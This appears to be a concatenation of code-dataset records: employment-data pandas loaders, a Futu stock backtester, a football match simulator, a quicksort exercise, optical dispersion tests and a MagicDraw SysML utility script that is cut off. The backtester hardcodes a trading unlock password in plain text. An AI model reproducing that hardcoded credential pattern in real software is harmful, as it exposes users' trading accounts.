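    print(source.shape, target.shape, len_s, topics.shape)
```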
{"seq_id":"474917679","text":"from functools import reduce\nfrom os import getcwd\nfrom os.path import join\nimport pandas as pd\nfrom ast import literal_eval\nimport glob\n\n\nCURRENT_DIR = getcwd()\nEMPREGOS_DIR = join(CURRENT_DIR, \"data_sources/dados_empregos/*.txt\")\nCORRELACAO_DIR = join(CURRENT_DIR, \"data_sources/dados_empregos/correlacao/*.txt\")\nFILES_NAMES = glob.glob(EMPREGOS_DIR)\nCORRELACAO_FILES_NAMES = glob.glob(CORRELACAO_DIR)\n\ndef fillDataFramesEmpregos(file):\n \"\"\"\n Function that returns a dataframe built from the data in the file that was read\n :param file: String\n :return: Dictionary\n \"\"\"\n data_frame_dict = {}\n f = open(file, 'r', encoding='iso-8859-15')\n line = f.readline()\n dict = literal_eval(line)\n key = dict[\"nome_estendido\"][39:]\n df = pd.DataFrame(dict[\"valores\"])\n data_frame_dict[key] = df\n f.close()\n\n return data_frame_dict\n\n\ndef getDataFramesEmpregos():\n \"\"\"\n Function that maps the dataframe-generation function over the files\n :return: List\n \"\"\"\n global FILES_NAMES\n return list(map(fillDataFramesEmpregos, FILES_NAMES))\n\n\ndef dataFrameEmpregosFromJson(filename):\n \"\"\"\n Function that builds dataframes from the files in a special form used to produce the dataframe for the\n correlation chart\n :param filename: String\n :return: pandas.DataFrame\n \"\"\"\n f = open(filename, 'r', encoding='iso-8859-15')\n line = f.readline()\n dict = literal_eval(line)\n key = dict[\"nome_estendido\"][39:]\n ad = key.split(\",\")[-1].strip(\" \")\n categoria = key.split(\"-\")[0].strip(\" \")\n df = pd.DataFrame(dict[\"valores\"])\n df[\"categoria\"] = categoria\n df[\"admitidos/desligados\"] = ad\n f.close()\n return df\n\n\n\ndef getDataFrameEmpregosFromJson():\n \"\"\"\n Function that returns a single dataframe with all values condensed into one\n :return: pandas.DataFrame\n \"\"\"\n global FILES_NAMES\n list_df_desemprego = list(map(dataFrameEmpregosFromJson, CORRELACAO_FILES_NAMES))\n df_desemprego = reduce(lambda df1, df2: pd.concat([df1, df2], ignore_index=True, sort=True), list_df_desemprego)\n df_desemprego_group_by_desligados_uf = df_desemprego.groupby([\"estado_ibge\", \"ano\", \"admitidos/desligados\"])[\n \"valor\"].sum().reset_index(name='total_desempregados')\n df_desemprego_group_by_desligados_uf = df_desemprego_group_by_desligados_uf[\n df_desemprego_group_by_desligados_uf[\"admitidos/desligados\"] == \"Desligado\"].reset_index()\n del df_desemprego_group_by_desligados_uf['index']\n return df_desemprego_group_by_desligados_uf","sub_path":"src/data_sources/dataframes_empregos.py","file_name":"dataframes_empregos.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
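`getDataFrameEmpregosFromJson` above condenses the per-file frames with `reduce` + `concat`, then aggregates with a grouped sum and a named `reset_index`. The same aggregation shape on a toy frame (all data invented):

```python
# Toy version of the groupby-sum + reset_index(name=...) pattern above.
import pandas as pd

df = pd.DataFrame({
    "estado_ibge": [11, 11, 12],
    "ano": [2019, 2019, 2019],
    "admitidos/desligados": ["Desligado", "Desligado", "Admitido"],
    "valor": [5, 7, 3],
})
total = (df.groupby(["estado_ibge", "ano", "admitidos/desligados"])["valor"]
           .sum().reset_index(name="total_desempregados"))
print(total[total["admitidos/desligados"] == "Desligado"])
```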
{"seq_id":"260274192","text":"# -*- coding: utf-8 -*-\nimport math\nfrom datetime import datetime, date, time, timedelta\nfrom futuquant import *\n\nimport trader\n\nclass WeeklyTrader(object):\n \n # API parameter setting\n api_svr_ip = '127.0.0.1' # IP of the PC running the Futu NiuNiu client the account is logged into; local default is 127.0.0.1\n api_svr_port = 11111 # Futu NiuNiu port, default is 11111\n unlock_password = \"196331\" # unlock password for US and HK stock trading\n trade_env = 1 # 0: real trading 1: simulated trading (simulation has no password check; US stocks do not support simulation yet)\n trader = trader.Trader(10000,0,8)\n\n def __init__(self, stock):\n self.stock = stock\n self.quote_ctx = self.contextSetting()\n\n def contextSetting(self):\n \n SysConfig.set_client_info(\"LavrockFutuQuant\", 0)\n quote_ctx = OpenQuoteContext(host='127.0.0.1', port=11111)\n \n return quote_ctx\n\n def weeklyTopBottom(self,prices,index, n):\n\n if len(prices) == 0 or index - n < 0:\n print('len(klines) == 0 \n')\n return 0,0\n startIndex = index -n\n lc = float(prices[\"close\"][startIndex])\n hc = float(prices[\"close\"][startIndex])\n hh = float(prices[\"high\"][startIndex])\n ll = float(prices[\"low\"][startIndex])\n\n for i in range(startIndex, index): # was range(len(prices)-n, index), which only matches startIndex on the final bar\n # print(index)\n close = float(prices[\"close\"][i])\n open = float(prices[\"open\"][i])\n high = float(prices[\"high\"][i])\n low = float(prices[\"low\"][i])\n\n if hh < high:\n hh = high\n if hc < close:\n hc = close\n if ll > low:\n ll = low\n if lc > close:\n lc = close\n return hh,ll\n\n def handleDay(self,prices,index,isLastDay):\n hh,ll = self.weeklyTopBottom(prices,index,30)\n if hh ==0 or ll==0 :\n print('get_history_kline error!\n')\n return\n\n cur_price = prices['close'].values[index]\n cur_pos = self.trader.hold_count(self.stock)\n \n if cur_price <= ll or isLastDay:\n if cur_pos > 0:\n self.trader.sell(self.stock,cur_price)\n elif cur_price >= hh :\n if cur_pos == 0:\n self.trader.buy(self.stock,cur_price)\n \n def testBack(self,start,end):\n\n ret_code, days = self.quote_ctx.get_trading_days(\"US\", start, end)\n \n if ret_code != 0:\n print('get_trading_days error!\n')\n return\n print('get_trading_days:!\n', days)\n _, prices = self.quote_ctx.get_history_kline(self.stock, start=start,end=end)\n \n for index in range(len(prices)):\n self.handleDay(prices,index,index == len(prices) -1)\n \n print('money:!\n', self.trader.money)\n print('hold:!\n', self.trader.hold)\n print('count :!\n', len(self.trader.history))\n \n return\n\nif __name__ == \"__main__\":\n \n\n STOCK = \"US.TSLA\"\n \n test = WeeklyTrader(STOCK)\n test.testBack(\"2016-08-01\", \"2017-09-01\") ","sub_path":"src/weeklyTrader.py","file_name":"weeklyTrader.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
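The rule in `handleDay` above is a channel breakout: buy when the close reaches the rolling 30-bar high, exit at the rolling 30-bar low (or on the final bar). With the loop-bound fix noted above, the same channel can be computed vectorized; a sketch with an invented price series (window width and the high/low offsets are illustrative):

```python
# Rolling 30-bar channel, approximating the per-day signal of weeklyTopBottom.
import numpy as np
import pandas as pd

rng = np.random.default_rng(0)
close = pd.Series(100 + rng.standard_normal(200).cumsum())
high = close + 1.0   # invented intraday range
low = close - 1.0

upper = high.rolling(30).max().shift(1)   # prior 30-bar high
lower = low.rolling(30).min().shift(1)    # prior 30-bar low
buy = close >= upper
sell = close <= lower
print(int(buy.sum()), "breakout buys;", int(sell.sum()), "breakdown exits")
```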
{"seq_id":"557130924","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 13 17:16:20 2020\n@author: Alex Taylor\n\nHandles match logic\nteam1 - Team, home team\nteam2 - Team, away team\nverbose - Boolean, ...\nteamDeltaFactor - Float, ...\n\nTO DO:\n Yellow/Red cards\n Substitutions\n\"\"\" \n\nimport numpy as np\nimport random\nimport time\n\nclass Match:\n \n def __init__(self,team1,team2,verbose=False,teamDeltaFactor = 2.5):\n self.teams = [team1,team2]\n self.verbose = verbose\n self.goals = [0,0]\n self.minuteCounter = 0\n self.teamDeltaFactor = teamDeltaFactor\n # Calculate probability of scoring a goal based on form and team + player stats\n self.goalChance = [int(round(self.teams[0].form - self.teamDeltaFactor*(self.teams[0].attack / self.teams[1].defence) + random.randint(-2,2) - 2)),\\\n int(round(self.teams[1].form - self.teamDeltaFactor*(self.teams[1].attack / self.teams[0].defence) + random.randint(-2,2)))]\n # Attempt to break from lose streaks\n for i in range(2):\n if self.teams[i].loseStreak > 5:\n self.goalChance[i] -= 1\n self.goalChance[i] = max(self.goalChance[i],2)\n self.yellowChance = random.randint(40,80)\n self.redChance = random.randint(1,5)\n self.cards=[[0]*11,[0]*11]\n self.suspendedPlayers = [[],[]]\n self.matchLoop()\n \n def scoreGoal(self,teamIndex):\n self.goals[teamIndex] += 1\n self.teams[0].increaseGoals(teamIndex)\n self.teams[1].increaseGoals(1 - teamIndex)\n playerIndex = np.random.choice(range(11), 1, p=self.teams[teamIndex].goalProbabilities)[0] # 'p=' keyword: the third positional argument of np.random.choice is 'replace', not the probabilities\n while self.cards[teamIndex][playerIndex] > 1:\n playerIndex = random.randint(1,10)\n self.teams[teamIndex].players[playerIndex].scoreGoal()\n if self.verbose:\n print(f\"GOAL! {self.teams[teamIndex].name} {self.teams[teamIndex].players[playerIndex].name}\")\n if self.verbose:\n print(\"\")\n time.sleep(1.5)\n \n def giveCard(self,teamIndex):\n playerIndex = random.randint(0,10)\n while playerIndex in self.suspendedPlayers[teamIndex]:\n playerIndex = random.randint(0,10)\n self.cards[teamIndex][playerIndex] += 1\n if self.cards[teamIndex][playerIndex] > 1:\n self.suspendedPlayers[teamIndex].append(playerIndex)\n if self.verbose:\n print(f\"RED CARD! {self.teams[teamIndex].name} {self.teams[teamIndex].players[playerIndex].name}\")\n self.goalChance[teamIndex] += 3\n self.goalChance[1-teamIndex] -= 3\n self.goalChance[1-teamIndex] = max(self.goalChance[1-teamIndex],2)\n else:\n if self.verbose:\n print(f\"YELLOW CARD! {self.teams[teamIndex].name} {self.teams[teamIndex].players[playerIndex].name}\")\n if self.verbose:\n print(\"\")\n time.sleep(1.5)\n \n def matchLoop(self):\n while self.minuteCounter <= 90:\n # Check for goal scored\n if random.randint(0,1) == 0:\n if random.randint(0,self.goalChance[0]) == 0:\n self.scoreGoal(0)\n else:\n if random.randint(0,self.goalChance[1]) == 0:\n self.scoreGoal(1)\n # Check for card\n if random.randint(0,self.yellowChance) == 0:\n self.giveCard(random.randint(0,1))\n # Update ticker\n if self.verbose: \n print(str(self.minuteCounter) + ': ' + self.teams[0].name + \" \" \n + str(self.goals[0]) + ' - ' + str(self.goals[1]) + \" \" + self.teams[1].name)\n time.sleep(0.08)\n self.minuteCounter += 1\n if self.goals[0] > self.goals[1]:\n self.teams[0].setResult(0)\n self.teams[1].setResult(2)\n elif self.goals[0] < self.goals[1]:\n self.teams[0].setResult(2)\n self.teams[1].setResult(0)\n else:\n self.teams[0].setResult(1)\n self.teams[1].setResult(1)","sub_path":"LeagueSimulator/match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":4066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"72070270","text":"# Problem: https://www.hackerrank.com/challenges/quicksort1/problem\n\ndef quickSort(arr): \n left, right, mid = [], [], []\n for i in range(len(arr)): \n if arr[i] < arr[0]:\n left.append(arr[i])\n elif arr[i] > arr[0]:\n right.append(arr[i])\n else:\n mid.append(arr[i])\n print(*(left + mid + right))\n\n\nn = int(input())\narr = list(map(int, input().rstrip().split()))\nresult = quickSort(arr) # note: quickSort prints the partition and returns None\n\n","sub_path":"Hackerrank/Algorithms/quicksor1-Partition.py","file_name":"quicksor1-Partition.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"641395117","text":"from rels import *\r\n\r\ndf = raw_df\r\nfirst = 1\r\nfinal_df = df\r\ntrain_set_len = 1000 # len(vEntryList) - 100 == 1625\r\nfor i in range(train_set_len):\r\n # Data proc.\r\n raw_data = pd.DataFrame(df[vEntryList[i][0]:vEntryList[i + 1][0]])\r\n new_df = df_process(raw_data)\r\n\r\n # smoothing and cutting\r\n cols_to_smooth = [col for col in new_df.columns if 'Local' in col]\r\n sm_start = 15\r\n sm_end = new_df.shape[0] - 15\r\n sm_len = 5\r\n # for col in cols_to_smooth:\r\n # new_df = df_smoother(new_df, col, sm_start, sm_end, sm_len)\r\n new_df = new_df[sm_start:sm_end]\r\n new_df['final_X_pre'] = new_df['Local_X_pre']\r\n new_df['final_Y_pre'] = new_df['Local_Y_pre']\r\n new_df = new_df.drop(columns=['Local_X_pre', 'Local_Y_pre'])\r\n if first:\r\n first = 0\r\n final_df = new_df\r\n else:\r\n final_df = final_df.append(new_df, ignore_index=True)\r\n print('No.', i + 1, 'Vehicle DF save OK.', i + 1, '/', 
train_set_len, final_df.shape)\r\n\r\nsaveFile = open('df_concat_res_0605_1000.bin', 'wb')\r\npickle.dump(final_df, saveFile)\r\nsaveFile.close()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"323530473","text":"import pytest\nimport numpy as np\nfrom scipy import constants as C\nimport dispersion\n\nclass TestSpotCheckSolids:\n # Most of the data points from https://refractiveindex.info\n l1 = 1.0e-6/(2*np.pi)\n w1 = C.c/l1\n def test_bk7(self):\n mat = dispersion.BK7(self.l1)\n data = [(.532e-6,1.5195),(.6328e-6,1.51502),(1.064e-6,1.5066)]\n for d in data:\n w = 2*np.pi*C.c/d[0]\n n = np.sqrt(1+mat.chi(w/self.w1))\n assert n == pytest.approx(d[1],1e-4)\n def test_germanium(self):\n mat = dispersion.Ge(self.l1)\n data = [(2e-6,4.1085),(5e-6,4.0158),(10e-6,4.0040)]\n for d in data:\n w = 2*np.pi*C.c/d[0]\n n = np.sqrt(1+mat.chi(w/self.w1))\n assert n == pytest.approx(d[1],1e-4)\n def test_znse(self):\n mat = dispersion.ZnSe(self.l1)\n data = [(2.5e-6,2.4362),(5e-6,2.4132),(10e-6,2.3923)]\n for d in data:\n w = 2*np.pi*C.c/d[0]\n n = np.sqrt(1+mat.chi(w/self.w1))\n assert n == pytest.approx(d[1],1e-2)\n def test_nacl(self):\n mat = dispersion.NaCl(self.l1)\n data = [(2.5e-6,1.5330),(5e-6,1.5240),(10e-6,1.5000)]\n for d in data:\n w = 2*np.pi*C.c/d[0]\n n = np.sqrt(1+mat.chi(w/self.w1))\n assert n == pytest.approx(d[1],1e-2)\n def test_kcl(self):\n mat = dispersion.KCl(self.l1)\n data = [(2.5e-6,1.4780),(5e-6,1.4720),(10e-6,1.4580)]\n for d in data:\n w = 2*np.pi*C.c/d[0]\n n = np.sqrt(1+mat.chi(w/self.w1))\n assert n == pytest.approx(d[1],1e-2)\n","sub_path":"test/dispersion_test.py","file_name":"dispersion_test.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"418358049","text":"'''\nCreated on Nov 3, 2010\n\n@author: dlam\n'''\nfrom java.lang import *\nfrom com.nomagic.magicdraw.uml.symbols import *\nfrom com.nomagic.magicdraw.core import Application\nfrom com.nomagic.uml2.ext.jmi.helpers import StereotypesHelper\nfrom com.nomagic.magicdraw.openapi.uml import SessionManager\nfrom com.nomagic.magicdraw.openapi.uml import ModelElementsManager\nfrom com.nomagic.uml2.ext.jmi.helpers import ModelHelper\nfrom com.nomagic.magicdraw.ui.dialogs import *\nfrom com.nomagic.uml2.ext.magicdraw.classes.mdkernel import *\nfrom com.nomagic.uml2.ext.magicdraw.classes.mddependencies import *\nfrom com.nomagic.uml2.ext.magicdraw.classes.mdinterfaces import *\nfrom com.nomagic.uml2.ext.magicdraw.actions.mdbasicactions import *\nfrom com.nomagic.uml2.ext.magicdraw.activities.mdbasicactivities import *\nfrom com.nomagic.uml2.ext.magicdraw.activities.mdintermediateactivities import *\nfrom com.nomagic.uml2.ext.magicdraw.auxiliaryconstructs.mdinformationflows import *\nfrom com.nomagic.uml2.ext.magicdraw.activities.mdfundamentalactivities import *\nfrom com.nomagic.uml2.ext.magicdraw.compositestructures.mdports import Port\n\nfrom javax.swing import JOptionPane\nfrom javax.swing import JCheckBox\nfrom jarray import array\n\nproject = Application.getInstance().getProjectsManager().getActiveProject()\nBlockStereotype = StereotypesHelper.getStereotype(project,\"Block\")\nConstraintBlockStereotype = StereotypesHelper.getStereotype(project, 'ConstraintBlock')\n\nPartPropertyStereotype = StereotypesHelper.getStereotype(project, 'PartProperty')\nValuePropertyStereotype = 
StereotypesHelper.getStereotype(project, 'ValueProperty')\nConstraintPropertyStereotype = StereotypesHelper.getStereotype(project, 'ConstraintProperty')\nSharedPropertyStereotype = StereotypesHelper.getStereotype(project, 'SharedProperty')\nReferencePropertyStereotype = StereotypesHelper.getStereotype(project, 'ReferenceProperty')\n\nBindingConnectorStereotype = StereotypesHelper.getStereotype(project, 'BindingConnector')\nNestedConnectorEndStereotype = StereotypesHelper.getStereotype(project, 'NestedConnectorEnd')\n\nConstraintParameterStereotype = StereotypesHelper.getStereotype(project, 'ConstraintParameter')\nFlowPortStereotype = StereotypesHelper.getStereotype(project, 'FlowPort')\n\nRealValueType = filter(lambda element: element.getName() == 'Real',\n ModelHelper.getElementsOfType(project.getModel(), [DataType], False))[0]\nIntegerValueType = filter(lambda element: element.getName() == 'Integer',\n ModelHelper.getElementsOfType(project.getModel(), [DataType], False))[0]\nBooleanValueType = filter(lambda element: element.getName() == 'Boolean',\n ModelHelper.getElementsOfType(project.getModel(), [DataType], False))[0]\n\nTrueStrings = ['true', 't']\nFalseStrings = ['false', 'f']\n\nguiLog = Application.getInstance().getGUILog()\nelementsFactory = project.getElementsFactory()\n\ndef getRealizedInterfaces(cs):\n \"\"\"\n get the interfaces that given model elements realize (Interface Realization)\n params:\n a list of model elements\n returns:\n a list of interfaces, empty list if nothing found\"\"\"\n i = []\n for c in cs:\n for r in c.get_directedRelationshipOfSource():\n if isinstance(r, InterfaceRealization):\n i.append(ModelHelper.getSupplierElement(r))\n return i\n\ndef getInfoFlows(source, target):\n \"\"\"\n get the conveyed information from source to target\n assumes there's at most one information flow for a given source and target\n uses the first information flow it finds otherwise\n params:\n source model element\n target model element\n returns:\n a list of conveyed information model elements, empty list if none\"\"\"\n for r in source.get_directedRelationshipOfSource():\n if isinstance(r, InformationFlow):\n if ModelHelper.getSupplierElement(r) == target:\n return r.getConveyed()\n return []\n\ndef getInfoFlowsConveyed(e, out):\n '''\n params:\n a model element\n boolean: direction\n returns:\n information conveyed on information flows into or out of element (toggle by out)'''\n all = []\n if not out:\n for r in e.get_directedRelationshipOfTarget():\n if isinstance(r, InformationFlow):\n for i in r.getConveyed():\n if i not in all:\n all.append(i)\n else:\n for r in e.get_directedRelationshipOfSource():\n if isinstance(r, InformationFlow):\n for i in r.getConveyed():\n if i not in all:\n all.append(i)\n return all\n\ndef expandGeneralizations(es):\n res = []\n for e in es:\n res.append(e)\n res.extend(collectGeneralizations(e, True))\n res.extend(collectGeneralizations(e, False))\n return res\n\ndef collectRelationshipEndsByStereotype(source, s, supplier):\n \"\"\"\n get related elements related with given stereotype (includes derived)\n params:\n a model element\n a stereotype element\n boolean: whether to treat model element as source or target of relationship\n returns:\n list of model elements, empty list if none\"\"\"\n relevant = []\n rs = None\n if supplier:\n rs = source.get_directedRelationshipOfTarget()\n else:\n rs = source.get_directedRelationshipOfSource()\n for r in rs:\n if StereotypesHelper.hasStereotypeOrDerived(r, s):\n if supplier:\n 
relevant.append(ModelHelper.getClientElement(r))\n else:\n relevant.append(ModelHelper.getSupplierElement(r))\n return relevant\n\ndef collectManyRelationshipEndsByStereotype(sources, s, supplier):\n \"\"\"\n get related elements related with given stereotype (includes derived)\n params:\n list of model elements\n a stereotype element\n boolean: whether to treat model elements as source or target of relationship\n returns:\n list of model elements, empty list if none\"\"\"\n alls = []\n for e in sources:\n blah = collectRelationshipEndsByStereotype(e, s, supplier)\n for b in blah:\n if b not in alls:\n alls.append(b)\n return alls\n\n# internal func\ndef _collectRecursivePartsElements(source, alls):\n #alls.append(source)\n parts = source.getPart()\n for p in parts:\n t = p.getType()\n if t is not None:\n alls.append(t)\n _collectRecursivePartsElements(t, alls)\n\ndef collectPartElementsByStereotypes(source, filters):\n \"\"\"\n get all children of model element by composition recursively (not including model element) with given stereotypes (including derived)\n params:\n a model element (has to be subclass of StructuredClassifier)\n list of stereotype elements\n returns:\n list of children that fits stereotypes, or empty list\"\"\"\n alls = []\n _collectRecursivePartsElements(source, alls)\n return filterElementsByStereotypes(alls, filters)\n\ndef collectRecursivePartsElements(source):\n \"\"\"\n get all children of model element by composition recursively (not including model element)\n params:\n a model element (has to be subclass of StructuredClassifier)\n list of stereotype elements\n returns:\n list of children or empty list\"\"\"\n alls = []\n _collectRecursivePartsElements(source, alls)\n return alls\n\n# input is a list of elements, stereotype is a stereotype element\ndef filterElementsByStereotypes(sourceList, stereotypes):\n ret = []\n for s in sourceList:\n for t in stereotypes:\n if StereotypesHelper.hasStereotypeOrDerived(s, t) and s not in ret:\n ret.append(s)\n return ret\n\ndef filterElementsByStereotypedType(elements, stereotype):\n return filter(lambda element: StereotypesHelper.hasStereotypeOrDerived(element.getType(), stereotype),\n elements)\n\n# internal func\ndef _collectRecursiveOwnedElements(source, alls):\n if not isinstance(source, Package):\n return\n owned = source.getOwnedElement()\n alls.extend(owned)\n for e in owned:\n _collectRecursiveOwnedElements(e, alls)\n\ndef collectElementsByStereotypes(source, filters):\n \"\"\"\n get all owned elements of model element (diagram or package) with given stereotypes (including derived)\n if source is diagram, gives all model elements on that diagram (not presentation elements)\n params:\n a model element (can be diagram or Package)\n list of stereotype elements\n returns:\n list of elements that fits stereotypes, or empty list\"\"\"\n alls = []\n if isinstance(source, Diagram):\n project = Application.getInstance().getProject()\n alls.extend(project.getDiagram(source).getUsedModelElements(False))\n else:\n _collectRecursiveOwnedElements(source, alls)\n return filterElementsByStereotypes(alls, filters)\n\n# internal func\ndef _collectGeneralizationsRecursive(source, down, alls):\n rs = None\n if down:\n rs = source.get_directedRelationshipOfTarget()\n else:\n rs = source.get_directedRelationshipOfSource()\n for r in rs:\n if isinstance(r, Generalization):\n if down:\n alls.append(ModelHelper.getClientElement(r))\n _collectGeneralizationsRecursive(ModelHelper.getClientElement(r), down, alls)\n else:\n 
alls.append(ModelHelper.getSupplierElement(r))\n _collectGeneralizationsRecursive(ModelHelper.getSupplierElement(r), down, alls)\n\ndef collectGeneralizations(source, down):\n \"\"\"\n get all generalize related elements from model element, regardless of depth\n params:\n model element\n boolean: more specific or more general\n returns:\n list of generalization elements\"\"\"\n relevant = []\n _collectGeneralizationsRecursive(source, down, relevant)\n return relevant\n\ndef getUserSelections(types, root, multiple, name='Select element(s)', display=None):\n \"\"\"\n shows a selection box\n params:\n a list of model metaclasses selectable (this is the actual class from imports)\n note to display nested elements (for example, pins on actions), you have to provide\n all metaclasses that owns those elements, and they have to be \"concrete\" classes (as shown in MD's spec dialog)\n ex. to show pins as selectables: give [Activity, CallBehaviorAction, OutputPin, InputPin]\n [Activity, Action, Pin] WILL NOT WORK!!!\n root of the selection (usually just project.getModel() to display the entire model tree)\n boolean multiple: whether can select multiple\n returns:\n if multiple is false, returns selected element\n if multiple is true, returns list of selected elements\n if user didn't click ok, returns None\"\"\"\n a = SelectElementTypes(display,types)\n #SelectElementType(display, select)\n b = SelectElementInfo(False, True, True, True)\n b.root = root\n b.showDiagrams = False\n b.showNone = False\n b.sortable = True\n z = None\n if not multiple:\n z = SelectElementDlg(MDDialogParentProvider.getProvider().getDialogParent(), None, a, b)\n z.setTitle(name)\n else:\n z = SelectElementsDlg(MDDialogParentProvider.getProvider().getDialogParent(), a, b, False, False, None)\n z.setTitle(name)\n z.setVisible(True)\n if z.isOk():\n return z.getSelected()\n return None\n\ndef getUserDropdownSelection(title, message, selectionElements):\n elementStrings = [e.getQualifiedName() for e in selectionElements]\n input = JOptionPane.showInputDialog(None, message, title, JOptionPane.PLAIN_MESSAGE, None, elementStrings, None)\n if input is not None:\n index = elementStrings.index(input)\n return selectionElements[index]\n return input\n\ndef getUserCheckboxSelections(title, message, selectionElements):\n elementStrings = [e.getName() for e in selectionElements]\n checkboxes = [JCheckBox(e) for e in elementStrings]\n l = [message]\n l.extend(checkboxes)\n \n input = JOptionPane.showMessageDialog(None, array(l, Object), title, JOptionPane.QUESTION_MESSAGE)\n checked = [e.isSelected() for e in checkboxes]\n res = []\n i = 0\n for check in checked:\n if check:\n res.append(selectionElements[i])\n i = i+1\n return res \n\ndef getConnectedPins(pin, out=True):\n \"\"\"\n gets the pins this is connected to (in the context of one activity diagram or in one activity)\n params: \n an input or output pin (can also be fork/join or decision/merge node, or parameter node)\n optional boolean if fork/join or decision/merge: True is find all pins connected from the node (default), false is pins to node\n returns:\n list of pin elements or parameter nodes\"\"\"\n pins = []\n #todo: take care of actiivty parameter node that are INOUT or RETURN? 
account for circular loops\n if isinstance(pin, InputPin) or (isinstance(pin, ControlNode) and not out) or (isinstance(pin, ActivityParameterNode) and pin.getParameter().getDirection() == ParameterDirectionKindEnum.OUT):\n for f in pin.getIncoming():\n p = f.getSource()\n if isinstance(p, ControlNode):\n pins.extend(getConnectedPins(p, False))\n else: #what if activity param node?\n pins.append(p)\n elif isinstance(pin, OutputPin) or (isinstance(pin, ControlNode) and out) or (isinstance(pin, ActivityParameterNode) and pin.getParameter().getDirection() == ParameterDirectionKindEnum.IN):\n for f in pin.getOutgoing():\n p = f.getTarget()\n if isinstance(p, ControlNode):\n pins.extend(getConnectedPins(p, True))\n else:\n pins.append(p)\n return pins\n \ndef getBaseOfPin(pin):\n \"\"\"\n gets the lowest level pin(s) connected to the given pin\n ex. given a pin on an action, find its parameter/parameter node if available \n and drill down recursively to see what the lowest level pins it represents,\n this can be more than one due to fork and decision nodes\n input:\n a pin \n returns:\n a list of the lowest level pins, if pin given is already lowest level, returns given pin in a list\"\"\"\n param = pin.getParameter()\n if param is None:\n return [pin]\n paramNode = param.get_activityParameterNodeOfParameter()\n if not paramNode.isEmpty():\n paramNode = paramNode.iterator().next()\n else:\n return [pin]\n paramNodeConnected = getConnectedPins(paramNode)\n if len(paramNodeConnected) == 0:\n return [pin]\n else:\n collect = []\n for p in paramNodeConnected:\n collect.extend(getBaseOfPin(p))\n return collect\n\ndef getAllRelatedParamNodePins(param, excludes=[]):\n \"\"\"\n gets all the related parameter nodes, pins, and parameters related to input parameter\n This will trace from the input parameter, to its pin instances, its parameter nodes, to all the other\n pins and nodes and their parameters that this is connected to. 
In other words, everything that's \n related to input parameter regardless of degree of separation\n input:\n parameter of an activity\n optional: list of parameters to exclude\n returns:\n list of pins, activity parameter nodes, and parameters\"\"\"\n res = []\n newExcludes = list(excludes)\n newExcludes.append(param)\n paramPins = param.get_pinOfParameter()\n for pin in paramPins:\n related = getConnectedPins(pin)\n for r in related:\n rparam = r.getParameter()\n if rparam is not None and rparam not in excludes:\n res.extend(getAllRelatedParamNodePins(rparam, newExcludes))\n res.append(rparam)\n paramNodes = param.get_activityParameterNodeOfParameter()\n for node in paramNodes:\n related = getConnectedPins(node)\n for r in related:\n rparam = r.getParameter()\n if rparam not in excludes:\n res.extend(getAllRelatedParamNodePins(rparam, newExcludes))\n res.append(rparam)\n res.extend(paramPins)\n res.extend(paramNodes)\n return res\n\ndef getContainingActivities(act):\n \"\"\"\n shows where an activity is used as an action in all levels\n input:\n activity\n returns:\n list of activities that contain an instance of given activity\n empty list if none\"\"\"\n returns = []\n calls = act.get_callBehaviorActionOfBehavior()\n for c in calls:\n returns.append(c.getActivity())\n return returns\n\ndef getActivityDiagram(act):\n '''\n input:\n activity\n returns:\n the first diagram element found in activity, None if none'''\n for e in act.getOwnedElement():\n if isinstance(e, Diagram):\n return e\n return None\n \n\ndef intersectionOfLists(a, b):\n #return list(set(a).intersection(set(b)))\n r = []\n for i in a:\n if i in b:\n r.append(i)\n return r\n \ndef getNonRedefinedAttrs(e):\n ref = []\n for a in e.getOwnedAttribute():\n if not a.hasRedefinedProperty():\n ref.append(a)\n return ref\n\ndef getRedefinedAttrs(e):\n ref = []\n for a in e.getOwnedAttribute():\n if a.hasRedefinedProperty():\n ref.append(a)\n return ref\n\ndef setRedefine(parent, child):\n redefs = child.getRedefinedProperty()\n if isinstance(child, Port):\n redefs = child.getRedefinedPort()\n redefs.clear()\n redefs.add(parent)\n\n\ndef findRedefinedInChild(prop, child):\n '''\n returns the first property in child found to redefine prop'''\n for cprop in child.getOwnedAttribute():\n if cprop.hasRedefinedProperty():\n for r in cprop.getRedefinedProperty():\n if r is prop:\n return cprop\n return None\n\ndef findAllRedefinedInChild(prop, child):\n '''\n returns all properties in child found to redefine prop as a list'''\n res = []\n for attr in child.getOwnedAttribute():\n if attr.hasRedefinedProperty():\n for redef in attr.getRedefinedProperty():\n if redef is prop:\n res.append(attr)\n return res\n\ndef findConstraintPartBindings(conpart):\n '''\n for a given part, returns a map of ports to a map of connectors to the connected in the context of this part\n input:\n a part (this was originally written for sysml constraint parts, but should work for any part)\n returns:\n format: {port: {connector: opposite_role, ...}, ...}'''\n bindings = {}\n con = conpart.getType()\n if con is None:\n return bindings\n for p in con.getOwnedPort():\n connectors = {}\n for cend in p.getEnd():\n if cend.getPartWithPort() is conpart:\n connector = cend.get_connectorOfEnd()\n ends = connector.getEnd()\n if ends.size() == 2:\n iterator = ends.iterator()\n end1 = iterator.next()\n if end1 is not cend:\n connectors[connector] = end1.getRole()\n else:\n connectors[connector] = iterator.next().getRole()\n else:\n pass\n #connector have to have 2 ends?!\n 
